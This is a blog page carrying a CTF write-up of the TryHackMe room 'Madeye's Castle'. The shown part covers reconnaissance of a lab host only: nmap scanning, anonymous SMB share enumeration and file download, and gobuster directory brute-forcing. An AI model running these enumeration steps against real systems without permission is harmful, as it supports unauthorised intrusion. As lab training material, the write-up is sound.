<!DOCTYPE html>



<html lang="en-US" 
  
>

  <!--
  The Head
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  
    <meta name="pv-cache-enabled" content="false">

    
  

  <!-- Begin Jekyll SEO tag v2.7.1 -->
<meta name="generator" content="Jekyll v4.2.0" />
<meta property="og:title" content="Tryhackme Madeye’s Castle" />
<meta name="author" content="Razor-Sec" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Some writeup all about cyber security Made by Razor-Sec Cybersecurity Cyber Security Enthusiast Ethical Hacking CTF Player Linux Operation" />
<meta property="og:description" content="Some writeup all about cyber security Made by Razor-Sec Cybersecurity Cyber Security Enthusiast Ethical Hacking CTF Player Linux Operation" />
<link rel="canonical" href="/posts/writeup-tryhackme-madeye-castle/" />
<meta property="og:url" content="/posts/writeup-tryhackme-madeye-castle/" />
<meta property="og:site_name" content="Razor-Sec" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-02-10T00:00:00+07:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Tryhackme Madeye’s Castle" />
<meta name="twitter:site" content="@0xrxd" />
<meta name="twitter:creator" content="@Razor-Sec" />
<meta name="google-site-verification" content="google_meta_tag_verification" />
<script type="application/ld+json">
{"description":"Some writeup all about cyber security Made by Razor-Sec Cybersecurity Cyber Security Enthusiast Ethical Hacking CTF Player Linux Operation","@type":"BlogPosting","headline":"Tryhackme Madeye’s Castle","dateModified":"2020-02-10T00:00:00+07:00","datePublished":"2020-02-10T00:00:00+07:00","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/writeup-tryhackme-madeye-castle/"},"author":{"@type":"Person","name":"Razor-Sec"},"url":"/posts/writeup-tryhackme-madeye-castle/","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->


  <title>Tryhackme Madeye's Castle | Razor-Sec
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://www.favicon-generator.org/
-->



<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">
<link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">

<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png">
<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png">
<link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png">

<link rel="icon" type="image/png" sizes="192x192"  href="/assets/img/favicons/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

<link rel="manifest" href="/assets/img/favicons/manifest.json">
<meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'>
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">


  <!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">

  <!-- GA -->
  

  <!-- jsDelivr CDN -->
  <link rel="preconnect" href="cdn.jsdelivr.net">
  <link rel="dns-prefetch" href="cdn.jsdelivr.net">

  <!-- Bootstrap -->
  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"
    integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous">

  <!-- Font Awesome -->
  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"
    integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ="
    crossorigin="anonymous">

  <!--
  CSS selector for site.
-->

<link rel="stylesheet" href="/assets/css/style.css">


  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css">



  <!-- JavaScripts -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>

  <script defer
    src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script>

  <!--
  JS selector for site.
-->


  





<script defer src="/assets/js/dist/post.min.js"></script>






</head>


  <body data-spy="scroll" data-target="#toc">

    <!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end">

  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" alt="avatar" class="mx-auto">
        
        <img src="/assets/img/p.png" alt="avatar" onerror="this.style.display='none'">
      </a>
    </div>

    <div class="site-title mt-3">
      <a href="/">Razor-Sec</a>
    </div>

    <div class="site-subtitle font-italic">Some writeup about cyber security</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">
    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs -->
    
    <li class="nav-item">
      <a href="/categories/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        <span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/tags/" class="nav-link">
        <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i>
        <span>TAGS</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        <span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/about/" class="nav-link">
        <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i>
        <span>ABOUT</span>
      </a>
    </li> <!-- .nav-item -->
    

  </ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center">

    
      

      
      <a href="https://github.com/Razor-Sec" aria-label="github"
        class="order-3"
        target="_blank" rel="noopener">
        <i class="fab fa-github-alt"></i>
      </a>
      

    
      

      
      <a href="https://twitter.com/0xrxd" aria-label="twitter"
        class="order-4"
        target="_blank" rel="noopener">
        <i class="fab fa-twitter"></i>
      </a>
      

    
      

      
      <a href="
          javascript:location.href = 'mailto:' + ['markoyanfyan12','gmail.com'].join('@')" aria-label="email"
        class="order-5"
        >
        <i class="fas fa-envelope"></i>
      </a>
      

    
      

      
      <a href="/feed.xml" aria-label="rss"
        class="order-6"
        >
        <i class="fas fa-rss"></i>
      </a>
      

    

    
      
        <span class="icon-border order-2"></span>
      

      <span id="mode-toggle-wrapper" class="order-1">
        <!--
  Switch the mode between dark and light.
-->

<i class="mode-toggle fas fa-adjust"></i>

<script type="text/javascript">

  class ModeToggle {
    static get MODE_KEY() { return "mode"; }
    static get DARK_MODE() { return "dark"; }
    static get LIGHT_MODE() { return "light"; }

    constructor() {
      if (this.hasMode) {
        if (this.isDarkMode) {
          if (!this.isSysDarkPrefer) {
            this.setDark();
          }
        } else {
          if (this.isSysDarkPrefer) {
            this.setLight();
          }
        }
      }

      var self = this;

      /* always follow the system prefers */
      this.sysDarkPrefers.addListener(function() {
        if (self.hasMode) {
          if (self.isDarkMode) {
            if (!self.isSysDarkPrefer) {
              self.setDark();
            }

          } else {
            if (self.isSysDarkPrefer) {
              self.setLight();
            }
          }

          self.clearMode();
        }

        self.updateMermaid();
      });

    } /* constructor() */


    setDark() {
      $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
    }

    setLight() {
      $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
    }

    clearMode() {
      $('html').removeAttr(ModeToggle.MODE_KEY);
      sessionStorage.removeItem(ModeToggle.MODE_KEY);
    }

    get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); }

    get isSysDarkPrefer() { return this.sysDarkPrefers.matches; }

    get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; }

    get isLightMode() { return this.mode == ModeToggle.LIGHT_MODE; }

    get hasMode() { return this.mode != null; }

    get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); }

    /* get the current mode on screen */
    get modeStatus() {
      if (this.isDarkMode
        || (!this.hasMode && this.isSysDarkPrefer) ) {
        return ModeToggle.DARK_MODE;
      } else {
        return ModeToggle.LIGHT_MODE;
      }
    }

    updateMermaid() {
      if (typeof mermaid !== "undefined") {
        let expectedTheme = (this.modeStatus === ModeToggle.DARK_MODE? "dark" : "default");
        let config = { theme: expectedTheme };

        /* re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */
        $(".mermaid").each(function() {
          let svgCode = $(this).prev().children().html();
          $(this).removeAttr("data-processed");
          $(this).html(svgCode);
        });

        mermaid.initialize(config);
        mermaid.init(undefined, ".mermaid");
      }
    }

    flipMode() {
      if (this.hasMode) {
        if (this.isSysDarkPrefer) {
          if (this.isLightMode) {
            this.clearMode();
          } else {
            this.setLight();
          }

        } else {
          if (this.isDarkMode) {
            this.clearMode();
          } else {
            this.setDark();
          }
        }

      } else {
        if (this.isSysDarkPrefer) {
          this.setLight();
        } else {
          this.setDark();
        }
      }

      this.updateMermaid();

    } /* flipMode() */

  } /* ModeToggle */

  let toggle = new ModeToggle();

  $(".mode-toggle").click(function() {

    toggle.flipMode();

  });

</script>

      </span>
    

  </div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->


    <!--
  The Top Bar
-->

<div id="topbar-wrapper" class="row justify-content-center topbar-down">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb">

    

    

      

        
          

        

      

        
        <span>
          
          
          <a href="/">
            Posts
          </a>
        </span>

        

      

        
          <span>Tryhackme Madeye's Castle</span>

        

      

    

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
      Post
    </div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" placeholder="Search...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>


    <div id="main-wrapper">
      <div id="main">

        <!--
  Refactor the HTML structure.
-->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->


<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->


<!-- Add attribute 'hide-bullet' to the checkbox list -->




  

  

  <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->
  
  

  

  



<!-- return -->
<div class="row">

  <div id="post-wrapper" class="col-12 col-lg-11 col-xl-8">

    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

      <h1 data-toc-skip>Tryhackme Madeye's Castle</h1>

      <div class="post-meta text-muted d-flex flex-column">
        <!-- Published date and author -->
        <div>
          <!--
  Date format snippet
-->





<span class="timeago "
  
    data-toggle="tooltip"
    data-placement="bottom"
    title="Mon, Feb 10, 2020, 12:00 AM +0700"
  >

  
  

  
    Feb 10, 2020
  

  <i class="unloaded">2020-02-10T00:00:00+07:00</i>

</span>

          by
          <span class="author">
            Razor-Sec
          </span>
        </div>

        <div>
          <!-- lastmod -->
          

          <!-- read time -->
          <!--
  Calculate the post's reading time, and display the word count in tooltip
 -->


<!-- words per minute  -->







<!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom" title="2420 words">13 min</span>


          <!-- page views -->
          

        </div>

      </div> <!-- .post-meta -->

      <div class="post-content">

        

        <p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/bg.png" alt="Background" /></p>

<h2 id="introduction">Introduction</h2>

<p>in this room we will do a lot of enumeration , gain a foothold, pivot around to a few different users, etc . You can see the room right here <a href="https://tryhackme.com/room/madeyescastle">https://tryhackme.com/room/madeyescastle</a></p>

<h2 id="scanning">Scanning</h2>

<h3 id="nmap">Nmap</h3>
<p>what we have to do first is scanning the ip :</p>
<blockquote>
  <p>$ sudo nmap -sC -sV 10.10.185.66</p>
</blockquote>

<div class="language-bat highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
</pre></td><td class="rouge-code"><pre># <span class="kd">Nmap</span> <span class="m">7</span>.91 <span class="kd">scan</span> <span class="kd">initiated</span> <span class="kd">Mon</span> <span class="kd">Feb</span>  <span class="m">1</span> <span class="m">13</span>:01:15 <span class="m">2021</span> <span class="kd">as</span>: <span class="kd">nmap</span> <span class="na">-sC -sV -oA </span><span class="kd">nmap</span> <span class="kd">hogwarts</span><span class="na">-castle</span>.thm
<span class="kd">Nmap</span> <span class="kd">scan</span> <span class="kd">report</span> <span class="k">for</span> <span class="kd">hogwarts</span><span class="na">-castle</span>.thm <span class="o">(</span><span class="m">10</span>.10.128.52<span class="o">)</span>
<span class="kd">Host</span> <span class="kd">is</span> <span class="kd">up</span> <span class="o">(</span><span class="m">0</span>.34s <span class="kd">latency</span><span class="o">)</span>.
<span class="kd">Not</span> <span class="kd">shown</span>: <span class="m">996</span> <span class="kd">filtered</span> <span class="kd">ports</span>
<span class="kd">PORT</span>    <span class="kd">STATE</span> <span class="kd">SERVICE</span>     <span class="kd">VERSION</span>
<span class="m">22</span><span class="na">/tcp  </span><span class="kd">open</span>  <span class="kd">ssh</span>         <span class="kd">OpenSSH</span> <span class="m">7</span>.6p1 <span class="kd">Ubuntu</span> <span class="m">4</span><span class="kd">ubuntu0</span>.3 <span class="o">(</span><span class="kd">Ubuntu</span> <span class="kd">Linux</span><span class="o">;</span> <span class="kd">protocol</span> <span class="m">2</span>.0<span class="o">)</span>
<span class="o">|</span> <span class="kd">ssh</span><span class="na">-hostkey</span>: 
<span class="o">|</span>   <span class="m">2048</span> <span class="m">7</span><span class="kd">f</span>:5f:48:fa:3d:3e:e6:9c:23:94:33:d1:8d:22:b4:7a <span class="o">(</span><span class="kd">RSA</span><span class="o">)</span>
<span class="o">|</span>   <span class="m">256</span> <span class="m">53</span>:75:a7:4a:a8:aa:46:66:6a:12:8c:cd:c2:6f:39:aa <span class="o">(</span><span class="kd">ECDSA</span><span class="o">)</span>
<span class="o">|</span>_  <span class="m">256</span> <span class="m">7</span><span class="kd">f</span><span class="nl">:c</span><span class="m">2</span>:2f:3d:64:d9:0a:50:74:60:36:03:98:00:75:98 <span class="o">(</span><span class="kd">ED25519</span><span class="o">)</span>
<span class="m">80</span><span class="na">/tcp  </span><span class="kd">open</span>  <span class="kd">http</span>        <span class="kd">Apache</span> <span class="kd">httpd</span> <span class="m">2</span>.4.29 <span class="o">((</span><span class="kd">Ubuntu</span><span class="o">))</span>
<span class="o">|</span>_http<span class="na">-server-header</span>: <span class="kd">Apache</span>/2.4.29 <span class="o">(</span><span class="kd">Ubuntu</span><span class="o">)</span>
<span class="o">|</span>_http<span class="na">-title</span>: <span class="kd">Apache2</span> <span class="kd">Ubuntu</span> <span class="kd">Default</span> <span class="kd">Page</span>: <span class="kd">Amazingly</span> <span class="kd">It</span> <span class="kd">works</span>
<span class="m">139</span><span class="na">/tcp </span><span class="kd">open</span>  <span class="kd">netbios</span><span class="na">-ssn </span><span class="kd">Samba</span> <span class="kd">smbd</span> <span class="m">3</span>.X <span class="o">-</span> <span class="m">4</span>.X <span class="o">(</span><span class="kd">workgroup</span>: <span class="kd">WORKGROUP</span><span class="o">)</span>
<span class="m">445</span><span class="na">/tcp </span><span class="kd">open</span>  <span class="kd">netbios</span><span class="na">-ssn </span><span class="kd">Samba</span> <span class="kd">smbd</span> <span class="m">4</span>.7.6<span class="na">-Ubuntu </span><span class="o">(</span><span class="kd">workgroup</span>: <span class="kd">WORKGROUP</span><span class="o">)</span>
<span class="kd">Service</span> <span class="kd">Info</span>: <span class="kd">Host</span>: <span class="kd">HOGWARTZ</span><span class="na">-CASTLE</span><span class="o">;</span> <span class="kd">OS</span>: <span class="kd">Linux</span><span class="o">;</span> <span class="kd">CPE</span>: <span class="kd">cpe</span>:/o:linux:linux_kernel

<span class="kd">Host</span> <span class="kd">script</span> <span class="kd">results</span>:
<span class="o">|</span>_clock<span class="na">-skew</span>: <span class="kd">mean</span>: <span class="o">-</span><span class="m">4</span><span class="kd">s</span><span class="o">,</span> <span class="kd">deviation</span>: <span class="m">1</span><span class="kd">s</span><span class="o">,</span> <span class="kd">median</span>: <span class="o">-</span><span class="m">5</span><span class="kd">s</span>
<span class="o">|</span>_nbstat: <span class="kd">NetBIOS</span> <span class="kd">name</span>: <span class="kd">HOGWARTZ</span><span class="na">-CASTLE</span><span class="o">,</span> <span class="kd">NetBIOS</span> <span class="kd">user</span>: <span class="o">&lt;</span><span class="kd">unknown</span><span class="o">&gt;,</span> <span class="kd">NetBIOS</span> <span class="kd">MAC</span>: <span class="o">&lt;</span><span class="kd">unknown</span><span class="o">&gt;</span> <span class="o">(</span><span class="kd">unknown</span><span class="o">)</span>
<span class="o">|</span> <span class="kd">smb</span><span class="na">-os-discovery</span>: 
<span class="o">|</span>   <span class="kd">OS</span>: <span class="kd">Windows</span> <span class="m">6</span>.1 <span class="o">(</span><span class="kd">Samba</span> <span class="m">4</span>.7.6<span class="na">-Ubuntu</span><span class="o">)</span>
<span class="o">|</span>   <span class="kd">Computer</span> <span class="kd">name</span>: <span class="kd">hogwartz</span><span class="na">-castle
</span><span class="o">|</span>   <span class="kd">NetBIOS</span> <span class="kd">computer</span> <span class="kd">name</span>: <span class="kd">HOGWARTZ</span><span class="na">-CASTLE</span>\x00
<span class="o">|</span>   <span class="kd">Domain</span> <span class="kd">name</span>: \x00
<span class="o">|</span>   <span class="kd">FQDN</span>: <span class="kd">hogwartz</span><span class="na">-castle
</span><span class="o">|</span>_  <span class="kd">System</span> <span class="nb">time</span>: <span class="m">2021</span><span class="o">-</span><span class="m">02</span><span class="o">-</span><span class="m">01</span><span class="kd">T06</span>:01:41<span class="o">+</span><span class="m">00</span>:00
<span class="o">|</span> <span class="kd">smb</span><span class="na">-security-mode</span>: 
<span class="o">|</span>   <span class="kd">account_used</span>: <span class="kd">guest</span>
<span class="o">|</span>   <span class="kd">authentication_level</span>: <span class="kd">user</span>
<span class="o">|</span>   <span class="kd">challenge_response</span>: <span class="kd">supported</span>
<span class="o">|</span>_  <span class="kd">message_signing</span>: <span class="kd">disabled</span> <span class="o">(</span><span class="kd">dangerous</span><span class="o">,</span> <span class="kd">but</span> <span class="kd">default</span><span class="o">)</span>
<span class="o">|</span> <span class="kd">smb2</span><span class="na">-security-mode</span>: 
<span class="o">|</span>   <span class="m">2</span>.02: 
<span class="o">|</span>_    <span class="kd">Message</span> <span class="kd">signing</span> <span class="kd">enabled</span> <span class="kd">but</span> <span class="ow">not</span> <span class="kd">required</span>
<span class="o">|</span> <span class="kd">smb2</span><span class="na">-time</span>: 
<span class="o">|</span>   <span class="nb">date</span>: <span class="m">2021</span><span class="o">-</span><span class="m">02</span><span class="o">-</span><span class="m">01</span><span class="kd">T06</span>:01:41
<span class="o">|</span>_  <span class="kd">start_date</span>: <span class="kd">N</span><span class="na">/A

</span><span class="kd">Service</span> <span class="kd">detection</span> <span class="kd">performed</span>. <span class="kd">Please</span> <span class="kd">report</span> <span class="kd">any</span> <span class="kd">incorrect</span> <span class="kd">results</span> <span class="nb">at</span> <span class="kd">https</span>://nmap.org/submit/ .
# <span class="kd">Nmap</span> <span class="kd">done</span> <span class="nb">at</span> <span class="kd">Mon</span> <span class="kd">Feb</span>  <span class="m">1</span> <span class="m">13</span>:02:26 <span class="m">2021</span> <span class="o">--</span> <span class="m">1</span> <span class="kd">IP</span> <span class="kd">address</span> <span class="o">(</span><span class="m">1</span> <span class="kd">host</span> <span class="kd">up</span><span class="o">)</span> <span class="kd">scanned</span> <span class="k">in</span> <span class="m">70</span>.50 <span class="kd">seconds</span>
</pre></td></tr></tbody></table></code></div></div>
<h3 id="smb">SMB</h3>
<p>As you can see in nmap we have port open 139,445 which is it is smb share, then lets using smbmap for enumration smb</p>

<div class="language-bat highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre><span class="kd">smbmap</span> <span class="na">-H </span><span class="m">10</span>.10.185.66 <span class="na">-R                                                                                                                                   </span><span class="m">130</span> ⨯
<span class="o">[+]</span> <span class="kd">Guest</span> <span class="kd">session</span>       <span class="kd">IP</span>: <span class="m">10</span>.10.185.66:445    <span class="kd">Name</span>: <span class="kd">unknown</span>                                           
        <span class="kd">Disk</span>                                                    <span class="kd">Permissions</span>     <span class="kd">Comment</span>
        <span class="o">----</span>                                                    <span class="o">-----------</span>     <span class="o">-------</span>
        <span class="nb">print</span>$                                                  <span class="kd">NO</span> <span class="kd">ACCESS</span>       <span class="kd">Printer</span> <span class="kd">Drivers</span>
        <span class="kd">sambashare</span>                                              <span class="kd">READ</span> <span class="kd">ONLY</span>       <span class="kd">Harry</span><span class="s1">'s Important Files
        .\sambashare\*
        dr--r--r--                0 Thu Nov 26 08:19:19 2020    .
        dr--r--r--                0 Thu Nov 26 07:57:55 2020    ..
        fr--r--r--              874 Thu Nov 26 08:06:32 2020    spellnames.txt
        fr--r--r--              147 Thu Nov 26 08:19:19 2020    .notes.txt
        IPC$                                                    NO ACCESS       IPC Service (hogwartz-castle server (Samba, Ubuntu))
</span></pre></td></tr></tbody></table></code></div></div>
<p>There is some share with default setting which is everyone can access it.</p>
<div class="language-bat highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre><span class="kd">smbclient</span> //10.10.185.66/sambashare                                                                        <span class="m">1</span> ⨯
<span class="kd">Enter</span> <span class="kd">WORKGROUP</span>\razor<span class="s1">'s password: 
Try "help" to get a list of possible commands.
smb: \&gt; ls
  .                                   D        0  Thu Nov 26 08:19:20 2020
  ..                                  D        0  Thu Nov 26 07:57:55 2020
  spellnames.txt                      N      874  Thu Nov 26 08:06:32 2020
  .notes.txt                          H      147  Thu Nov 26 08:19:19 2020

                9219412 blocks of size 1024. 4413488 blocks available
smb: \&gt; get spellnames.txt
getting file \spellnames.txt of size 874 as spellnames.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \&gt; get .notes.txt 
getting file \.notes.txt of size 147 as .notes.txt (0.1 KiloBytes/sec) (average 0.4 KiloBytes/sec)

</span></pre></td></tr></tbody></table></code></div></div>
<p>now we have 2 file from smbshare lets checkit</p>
<ul>
  <li>spellnames.txt
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre>avadakedavra
crucio
imperio
-
-
-
incendio
evanesco
aguamenti
</pre></td></tr></tbody></table></code></div>    </div>
  </li>
  <li>.notes.txt
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>Hagrid told me that spells names are not good since they will not "rock you"
Hermonine loves historical text editors along with reading old books.
</pre></td></tr></tbody></table></code></div>    </div>
    <h3 id="gobuster">Gobuster</h3>
  </li>
</ul>

<p>now after enumeration we can scanning webserver especially for directory open</p>
<div class="language-bat highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre><span class="kd">gobuster</span> <span class="nb">dir</span> <span class="na">-u </span><span class="m">10</span>.10.185.66 <span class="na">-w /home/razor/Documents/Wordlist/SecLists/Discovery/Web-Content/directory-list</span><span class="o">-</span><span class="m">2</span>.3<span class="na">-medium</span>.txt 
<span class="o">===============================================================</span>
<span class="kd">Gobuster</span> <span class="kd">v3</span>.0.1
<span class="kd">by</span> <span class="kd">OJ</span> <span class="kd">Reeves</span> <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="o">&amp;</span> <span class="kd">Christian</span> <span class="kd">Mehlmauer</span> <span class="o">(</span>@_FireFart_<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[+]</span> <span class="kd">Url</span>:            <span class="kd">http</span>://10.10.185.66
<span class="o">[+]</span> <span class="kd">Threads</span>:        <span class="m">10</span>
<span class="o">[+]</span> <span class="kd">Wordlist</span>:       <span class="na">/home/razor/Documents/Wordlist/SecLists/Discovery/Web-Content/directory-list</span><span class="o">-</span><span class="m">2</span>.3<span class="na">-medium</span>.txt
<span class="o">[+]</span> <span class="kd">Status</span> <span class="kd">codes</span>:   <span class="m">200</span><span class="o">,</span><span class="m">204</span><span class="o">,</span><span class="m">301</span><span class="o">,</span><span class="m">302</span><span class="o">,</span><span class="m">307</span><span class="o">,</span><span class="m">401</span><span class="o">,</span><span class="m">403</span>
<span class="o">[+]</span> <span class="kd">User</span> <span class="kd">Agent</span>:     <span class="kd">gobuster</span>/3.0.1
<span class="o">[+]</span> <span class="kd">Timeout</span>:        <span class="m">10</span><span class="kd">s</span>
<span class="o">===============================================================</span>
<span class="m">2021</span>/02/10 <span class="m">18</span>:27:24 <span class="kd">Starting</span> <span class="kd">gobuster</span>
<span class="o">===============================================================</span>
<span class="na">/backup </span><span class="o">(</span><span class="kd">Status</span>: <span class="m">301</span><span class="o">)</span>
</pre></td></tr></tbody></table></code></div></div>
<p>if you dont have wordlist you can download right here : <a href="https://github.com/danielmiessler/SecLists">https://github.com/danielmiessler/SecLists</a></p>

<ul>
  <li>we found backup directory, now lets scan again to directory backup (“-u 10.10.185.66/backup “)
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>2021/02/10 18:31:43 Starting gobuster
===============================================================
/email (Status: 200)
</pre></td></tr></tbody></table></code></div>    </div>
    <p>then we found email, lets check it</p>
  </li>
</ul>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/bg_2.png" alt="Background" />
we have message from this directory, then lets check the source code webserver</p>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/bg_3.png" alt="Background" /></p>

<p>We found hosts on source code, now lets put this on /etc/hosts</p>
<div class="language-bat highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre>$ <span class="kd">sudo</span> <span class="kd">nano</span> <span class="na">/etc/hosts

</span><span class="m">127</span>.0.0.1       <span class="kd">localhost</span>
<span class="m">127</span>.0.1.1       <span class="kd">Razor</span>

<span class="m">10</span>.10.185.66 <span class="kd">hogwartz</span><span class="na">-castle</span>.thm
# <span class="kd">The</span> <span class="kd">following</span> <span class="kd">lines</span> <span class="kd">are</span> <span class="kd">desirable</span> <span class="k">for</span> <span class="kd">IPv6</span> <span class="kd">capable</span> <span class="kd">hosts</span>
<span class="c">::1     localhost ip6-localhost ip6-loopback</span>
<span class="kd">ff02</span>::1 <span class="kd">ip6</span><span class="na">-allnodes
</span><span class="kd">ff02</span>::2 <span class="kd">ip6</span><span class="na">-allrouters
</span></pre></td></tr></tbody></table></code></div></div>
<p>now lets go to http://hogwartz-castle.thm
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/bg_4.png" alt="Background" /></p>

